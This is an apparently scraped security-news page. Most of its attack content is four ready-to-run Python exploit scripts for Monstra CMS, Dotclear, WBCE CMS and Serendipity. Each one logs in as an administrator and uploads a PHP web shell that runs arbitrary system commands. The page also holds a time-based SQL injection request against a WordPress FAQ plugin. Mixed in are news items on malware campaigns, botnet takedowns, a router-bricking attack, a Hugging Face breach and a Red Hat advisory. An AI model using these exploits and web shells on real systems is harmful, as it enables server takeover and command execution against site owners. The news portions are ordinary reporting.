Monstra CMS version 3.0.4 suffers from a remote code execution vulnerability. Original discovery of code execution in this version is attributed to Ishaq Mohammed in December of 2017.

    # Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)# Date: 05.05.2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://monstra.org/# Software Link: https://monstra.org/monstra-3.0.4.zip# Version: 3.0.4# Tested on: MacOSimport requestsimport randomimport stringimport timeimport reimport sysif len(sys.argv) < 4:print("Usage: python3 script.py <url> <username> <password>")sys.exit(1)base_url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = requests.Session()login_url = f'{base_url}/admin/index.php?id=dashboard'login_data = {'login': username,'password': password,'login_submit': 'Log+In'}filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=5))print("Logging in...")response = session.post(login_url, data=login_data)if 'Dashboard' in response.text:print("Login successful")else:print("Login failed")exit()time.sleep(3)edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'response = session.get(edit_url) # CSRF token bulmak için edit sayfasınaerişimtoken_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="(.*?)"', response.text)if token_search:token = token_search.group(1)else:print("CSRF token could not be found.")exit()content = '''<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?phpif(isset($_GET['cmd'])){system($_GET['cmd']);}?></pre></body></html>'''edit_data = {'csrf': token,'name': filename,'content': content,'add_file': 'Save'}print("Preparing shell...")response = session.post(edit_url, data=edit_data)time.sleep(3)if response.status_code == 200:print(f"Your shell is ready: {base_url}/public/themes/default/{filename}.chunk.php")else:print("Failed to prepare shell.")

Monstra CMS 3.0.4 Remote Code Execution

Dotclear version 2.29 suffers from a remote code execution vulnerability.

    # Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 26.04.2024# Vendor Homepage: https://git.dotclear.org/explore/repos# Software Link:https://github.com/dotclear/dotclear/archive/refs/heads/master.zip# Tested Version: v2.29 (latest)# Tested on: MacOSimport requestsimport timeimport randomimport stringfrom bs4 import BeautifulSoupdef generate_filename(extension=".inc"):return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +extensiondef get_csrf_token(response_text):soup = BeautifulSoup(response_text, 'html.parser')token = soup.find('input', {'name': 'xd_check'})return token['value'] if token else Nonedef login(base_url, username, password):print("Exploiting...")time.sleep(1)print("Logging in...")time.sleep(1)session = requests.Session()login_data = {"user_id": username,"user_pwd": password}login_url = f"{base_url}/admin/index.php?process=Auth"login_response = session.post(login_url, data=login_data)if "Logout" in login_response.text:print("Login Successful!")return sessionelse:print("Login Failed!")return Nonedef upload_file(session, base_url, filename):print("Shell Preparing...")time.sleep(1)boundary = "---------------------------376201441124932790524235275389"headers = {"Content-Type": f"multipart/form-data; boundary={boundary}","X-Requested-With": "XMLHttpRequest"}csrf_token = get_csrf_token(session.get(f"{base_url}/admin/index.php?process=Media").text)payload = (f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"f"2097152\r\n"f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n"f"{csrf_token}\r\n"f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename}\"\r\n"f"Content-Type: image/jpeg\r\n\r\n""<html>\n<body>\n<form method=\"GET\" name=\"<?php echobasename($_SERVER['PHP_SELF']); ?>\">\n""<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<inputtype=\"SUBMIT\" value=\"Execute\">\n""</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}\n?>\n</pre>\n</body>\n</html>\r\n"f"--{boundary}--\r\n")upload_response = session.post(f"{base_url}/admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0",headers=headers, data=payload.encode('utf-8'))if upload_response.status_code == 200:print(f"Your Shell is Ready: {base_url}/public/{filename}")else:print("Exploit Failed!")def main(base_url, username, password):filename = generate_filename()session = login(base_url, username, password)if session:upload_file(session, base_url, filename)if __name__ == "__main__":import sysif len(sys.argv) != 4:print("Usage: python script.py <siteurl> <username> <password>")else:base_url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]main(base_url, username, password)

Dotclear 2.29 Remote Code Execution

WBCE CME version 1.6.2 suffers from a remote code execution vulnerability.

    # Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)# Date: 3/5/2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://wbce-cms.org/# Software Link:https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip# Version: 1.6.2# Tested on: MacOSimport requestsfrom bs4 import BeautifulSoupimport sysimport timedef login(url, username, password):print("Logging in...")time.sleep(3)with requests.Session() as session:response = session.get(url + "/admin/login/index.php")soup = BeautifulSoup(response.text, 'html.parser')form = soup.find('form', attrs={'name': 'login'})form_data = {input_tag['name']: input_tag.get('value', '') for input_tag inform.find_all('input') if input_tag.get('type') != 'submit'}# Kullanıcı adı ve şifre alanlarını dinamik olarak güncelleform_data[soup.find('input', {'name': 'username_fieldname'})['value']] =usernameform_data[soup.find('input', {'name': 'password_fieldname'})['value']] =passwordpost_response = session.post(url + "/admin/login/index.php", data=form_data)if "Administration" in post_response.text:print("Login successful!")time.sleep(3)return sessionelse:print("Login failed.")print("Headers received:", post_response.headers)print("Response content:", post_response.text[:500]) # İlk 500 karakterreturn Nonedef upload_file(session, url):# Dosya içeriğini ve adını belirleyinprint("Shell preparing...")time.sleep(3)files = {'upload[]': ('shell.inc',"""<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?phpif(isset($_GET['cmd'])){system($_GET['cmd']);}?></pre></body></html>""", 'application/octet-stream')}data = {'reqid': '18f3a5c13d42c5','cmd': 'upload','target': 'l1_Lw','mtime[]': '1714669495'}response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",files=files, data=data)if response.status_code == 200:print("Your Shell is Ready: " + url + "/media/shell.inc")else:print("Failed to upload file.")print(response.text)if __name__ == "__main__":url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = login(url, username, password)if session:upload_file(session, url)

WBCE CMS 1.6.2 Remote Code Execution

Serendipity version 2.5.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 26.04.2024# Vendor Homepage: https://docs.s9y.org/# Software Link:https://www.s9y.org/latest# Tested Version: v2.5.0 (latest)# Tested on: MacOSimport requestsimport timeimport randomimport stringfrom bs4 import BeautifulSoupdef generate_filename(extension=".inc"):return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +extensiondef get_csrf_token(response):soup = BeautifulSoup(response.text, 'html.parser')token = soup.find('input', {'name': 'serendipity[token]'})return token['value'] if token else Nonedef login(base_url, username, password):print("Logging in...")time.sleep(2)session = requests.Session()login_page = session.get(f"{base_url}/serendipity_admin.php")token = get_csrf_token(login_page)data = {"serendipity[action]": "admin","serendipity[user]": username,"serendipity[pass]": password,"submit": "Login","serendipity[token]": token}headers = {"Content-Type": "application/x-www-form-urlencoded","Referer": f"{base_url}/serendipity_admin.php"}response = session.post(f"{base_url}/serendipity_admin.php", data=data,headers=headers)if "Add media" in response.text:print("Login Successful!")time.sleep(2)return sessionelse:print("Login Failed!")return Nonedef upload_file(session, base_url, filename, token):print("Shell Preparing...")time.sleep(2)boundary = "---------------------------395233558031804950903737832368"headers = {"Content-Type": f"multipart/form-data; boundary={boundary}","Referer": f"{base_url}/serendipity_admin.php?serendipity[adminModule]=media"}payload = (f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"f"{token}\r\n"f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"f"admin\r\n"f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"f"media\r\n"f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"f"add\r\n"f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\";filename=\"{filename}\"\r\n"f"Content-Type: text/html\r\n\r\n""<html>\n<body>\n<form method=\"GET\" name=\"<?php echobasename($_SERVER['PHP_SELF']); ?>\">\n""<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<inputtype=\"SUBMIT\" value=\"Execute\">\n""</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}\n?>\n</pre>\n</body>\n</html>\r\n"f"--{boundary}--\r\n")response = session.post(f"{base_url}/serendipity_admin.php?serendipity[adminModule]=media", headers=headers,data=payload.encode('utf-8'))if f"File {filename} successfully uploaded as" in response.text:print(f"Your shell is ready: {base_url}/uploads/{filename}")else:print("Exploit Failed!")def main(base_url, username, password):filename = generate_filename()session = login(base_url, username, password)if session:token = get_csrf_token(session.get(f"{base_url}/serendipity_admin.php?serendipity[adminModule]=media"))upload_file(session, base_url, filename, token)if __name__ == "__main__":import sysif len(sys.argv) != 4:print("Usage: python script.py <siteurl> <username> <password>")else:main(sys.argv[1], sys.argv[2], sys.argv[3])

Serendipity 2.5.0 Remote Code Execution

Fake web browser updates are being used to deliver remote access trojans (RATs) and information stealer malware such as BitRAT and Lumma Stealer (aka LummaC2).
"Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware," cybersecurity firm eSentire said in a new report. "In April 2024, we observed FakeBat being distributed

Beware: Fake Browser Updates Deliver BitRAT and Lumma Stealer Malware

Plus: A whistleblower claims the Biden administration falsified a report on Gaza, “Operation Endgame” disrupts the botnet ecosystem, and more.

If you have a crypto wallet containing a fortune but forgot the password, all may not be lost. This week, a pair of researchers revealed how they cracked an 11-year-old password to a crypto wallet containing roughly $3 million in bitcoins. With a lot of skill and a bit of luck, the researchers uncovered a flaw in how a previous version of the RoboForm password manager generates passwords that allowed them to accurately figure out the missing login and access the buried treasure.

Police in Western countries are using a new tactic to go after cybercriminals who remain physically out of reach of US law enforcement: trolling. The recent takedowns of ransomware groups like LockBit go beyond the traditional disruption of online infrastructure to include messages on seized websites meant to mess with the minds of criminal hackers. Experts say these trollish tactics help sow distrust between cybercriminals—who already have ample reason to distrust one another.

A graduate student at the University of Minnesota has been charged under the Espionage Act for photographing a shipyard in Virginia where the US Navy assembles nuclear submarines and other vessels whose components are classified. What makes the case novel, however, is that he allegedly took the photos with a drone, making his prosecution likely the first of its kind in the US.

It was a big week for cops taking down botnets (as you’ll read more about below). This week, the US announced that it had disrupted what may be the “largest botnet ever,” according to FBI director Christopher Wray. The botnet, called 911 S5, included some 19 million hijacked IP addresses around the world, which authorities say were used to carry out billions of dollars in Covid-19 relief fraud, make bomb threats, traffic in child sexual abuse material, and more.

But that’s not all. Each week, we round up the security news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

More than a half-million internet routers were disabled last year in a malware attack carried out by an unknown threat actor targeting a US internet service provider. Launched in late October, the attack—one of the largest ever against the sector—reportedly disrupted internet across several Midwestern states. The attack was first disclosed this week by the security firm Black Lotus Labs, which did not identify the specific company affected. However, Ars Technica reports that the incident appears to have impacted a ISP called Windstream, which provides internet service to 18 states in the US Midwest and South.

Black Lotus Labs researchers say the attacker used off-the-shelf Chalubo malware to gain access to the routers, and that their firmware was eventually overwritten, effectively bricking the devices. The disruption resulted in a flood of complaints on a forum about the damaged routers. “The routers now just sit there with a steady red light on the front,” a user wrote on the DSLReports forum. “They won't even respond to a RESET.”

**Whistleblower Claims US “Falsified” Gaza Report to Protect Arms Sales**

The Biden administration allegedly fabricated the conclusion of a report released in early May which found the United States did not have “complete information to verify” whether US-made weapons had been used by Israel in contravention of international humanitarian law, according to a whistleblower, Stacy Gilbert, a senior civil-military expert who resigned in protest this week from the US State Department. Gilbert says the State Department experts who compiled the report clearly implicated Israel in limiting the amount of food and medical supplies able to reach Gaza; however, the report was reportedly taken out of the experts’ hands and then “edited at a higher level.”

The report consisted of a mandatory national security assessment that, had Israel been found in violation of humanitarian law, would have obligated the US to discontinue its arms sales. At the time of the report’s publishing, critics of the administration’s Gaza policy accused the White House of willfully ignoring the conduct of Israeli forces attempting to disrupt food deliveries to the famine-stricken Palestinian territory. Gilbert is the second US official to publicly resign this week in protest over the US’s involvement in the attacks.

**“Operation Endgame” Knocks Down Botnet Underworld**

An international coalition of law enforcement agencies, cybersecurity firms, and other organizations announced this week the disruption of large swathes of the global botnet ecosystem. Branded “Operation Endgame,” the effort targeted malware “droppers,” or malicious software that’s used to infiltrate a machine so it can be used to infect a machine with additional malware more easily. The droppers Operation Endgame targeted include IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and Trickbot, according to Europol, which says authorities seized more than 100 servers and 2,000 websites allegedly linked to cybercriminal activity. Law enforcement also arrested four “high-value” individuals; Germany added eight others to its most-wanted list. One of the “main suspects,” according to Europol, amassed a cryptocurrency fortune worth 69 million euros ($74 million) by renting out infrastructure for ransomware attacks. And the action isn’t over: The Operation Endgame website indicates a new announcement coming in the next several days.

**Pro-Israel Influence Op, Driven by AI, Targeted Americans on Meta Apps**

Meta says it has shut down an AI-driven network comprising hundreds of fake Facebook and Instagram accounts linked to an Israeli business intelligence firm. The company, Stoic, is accused of accepting contracts to propagate inauthentic pro-Israel content across the platforms for the purpose of manipulating North American users’ political views. Meta claimed Stoic’s influence operation was still in its “audience building” phase, “before they were able to gain engagement among authentic communities.”

Mysterious Hack Destroyed 600,000 Internet Routers

Artificial Intelligence (AI) company Hugging Face on Friday disclosed that it detected unauthorized access to its Spaces platform earlier this week.
"We have suspicions that a subset of Spaces’ secrets could have been accessed without authorization," it said in an advisory.
Spaces offers a way for users to create, host, and share AI and machine learning (ML) applications. It also functions as a

AI Company Hugging Face Notifies Users of Suspected Unauthorized Access

Red Hat Security Advisory 2024-3497-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3497.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:3497-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3497Issue date:         2024-05-30Revision:           03CVE Names:          CVE-2023-45230====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for VirtualMachines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.Security Fix(es):* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45230References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258685https://bugzilla.redhat.com/show_bug.cgi?id=2258697

Red Hat Security Advisory 2024-3497-03

BWL Advanced FAQ Manager version 2.0.3 suffers from a remote SQL injection vulnerability.

    Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL InjectionDate: 14 Apr 2024Exploit Author: Ivan Spiridonov (xbz0n)Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135Version: 2.0.3Tested on: Ubuntu 20.04CVE: CVE-2024-32136SQL InjectionSQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.Affected ComponentsPlugin: BWL Advanced FAQ ManagerVersion: 2.0.3Affected Parameter: 'date_range'Affected Page: /wp-admin/edit.phpDescriptionThe vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter.Proof of ConceptManual ExploitationThe following GET request demonstrates the vulnerability:GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analyticsConnection: closeCookie: [Relevant Cookies]Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.RecommendationsBWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.

BWL Advanced FAQ Manager 2.0.3 SQL Injection

Since February 2024, Cisco Talos has been observing an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) are common among other banking trojans coming out of Brazil.

Tag

#mac